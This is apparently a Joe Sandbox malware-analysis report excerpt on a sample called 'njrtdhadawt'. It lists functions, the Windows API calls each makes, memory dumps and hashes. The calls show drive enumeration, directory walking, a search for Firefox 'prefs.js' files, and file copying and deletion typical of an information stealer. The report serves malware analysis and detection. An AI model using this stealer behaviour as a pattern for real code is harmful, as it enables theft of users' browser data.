                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 150870b4bd43174b6e28e5e24586c3937456cf7c5ff89e3de271c99592816624
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2002B73294016D9BDB60FB26DD466DDB774AF00300F4145E1AA48B7126DFB9AF86AFC0
                                                                                                                                                                                                                                                          Function 00FF531F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00FF539F
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF53C2
                                                                                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 00FF53CB
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00FF53EB
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00FF5406
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4EF9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: FindFirstFileA.KERNEL32(?,?), ref: 00FF4F10
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF4F2C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF4F3D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,010159E0), ref: 00FF4F5E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,010159E4), ref: 00FF4F78
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4F9F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: StrCmpCA.SHLWAPI(?,01015616), ref: 00FF4FB3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: wsprintfA.USER32 ref: 00FF4FDC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: _memset.LIBCMT ref: 00FF5005
                                                                                                                                                                                                                                                            • Part of subcall function 00FF4EA5: lstrcatA.KERNEL32(?,?), ref: 00FF501A
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF5427
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF54A1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                          • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                          • Opcode ID: b7ca6dd7ba7ad8189d2dce835c85c6f7fc5dfd9bf1be1ef6a46327d1d7b354aa
                                                                                                                                                                                                                                                          • Instruction ID: dbb2c5ab16e9c78ecf85d675a83c98555a197684b541912564ca906662078d64
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7ca6dd7ba7ad8189d2dce835c85c6f7fc5dfd9bf1be1ef6a46327d1d7b354aa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0513AB190021CAFDF319FA5CC85AEABBB9FF05744F004099EB48A6111EB359E88DF55
                                                                                                                                                                                                                                                          Function 00FECEEB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FECF10
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00FECF27
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016520), ref: 00FECF48
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016524), ref: 00FECF62
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00FED569,010158B5,01016528,?,010158AF), ref: 00FECFF5
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,01016540,010158B6,?,0101653C,01016538,01016534,01016530), ref: 00FED2D6
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FED2EA
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FED3F0
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FED404
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                                                                                          • String ID: %s\*.*
                                                                                                                                                                                                                                                          • API String ID: 3967855609-1013718255
                                                                                                                                                                                                                                                          • Opcode ID: 998b2dbb31734aaf263cb02a81077ad1402e68d8a66c150904c14fee5619e2ba
                                                                                                                                                                                                                                                          • Instruction ID: 77028e383c68ca412375b8ba9625977573f0466322f5a68a101ee8dee1c8d2d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 998b2dbb31734aaf263cb02a81077ad1402e68d8a66c150904c14fee5619e2ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DD19A3290116D9AEF60FB25DD42AED7774AF44300F4104E1AA08B7127DAB97F85AFC1
                                                                                                                                                                                                                                                          Function 6CD240D0 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                                                                                                                                                                                                                                          • API String ID: 0-1562099544
                                                                                                                                                                                                                                                          • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                                                                                                                                                                                                                                          • Instruction ID: f007c44e4c4bf333df918481b702c192f902f831696d9f049be4788adeca95a0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                                                                                                                                                                                                                                          Function 00FED77A Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,010165A4,010158DE,?,?,?), ref: 00FED7FB
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010165A8), ref: 00FED81C
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010165AC), ref: 00FED836
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,010165B0,?,010158DF), ref: 00FED8C2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FED99C
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEDA67
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEDB0A
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEDB1E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                                                                                          • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                          • Opcode ID: 84fd528ce7583de5e26282625443cb4826e5342eb8c281a5377e8b1a9bfb6c0e
                                                                                                                                                                                                                                                          • Instruction ID: aeab9cc38a66d363c8d812df4f061cb283109da4f38e01d07620a7d1a7c7cf2e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84fd528ce7583de5e26282625443cb4826e5342eb8c281a5377e8b1a9bfb6c0e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78A1093290016C9BDB60FB25DC46BDD7374AF05310F8145E1EA08B7266DA79AF89AFC1
                                                                                                                                                                                                                                                          Function 00FEBA79 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,01015833,?,?,?), ref: 00FEBAD5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016470), ref: 00FEBAF6
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016474), ref: 00FEBB10
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEBF45
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEBFBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEC02B
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEC03F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
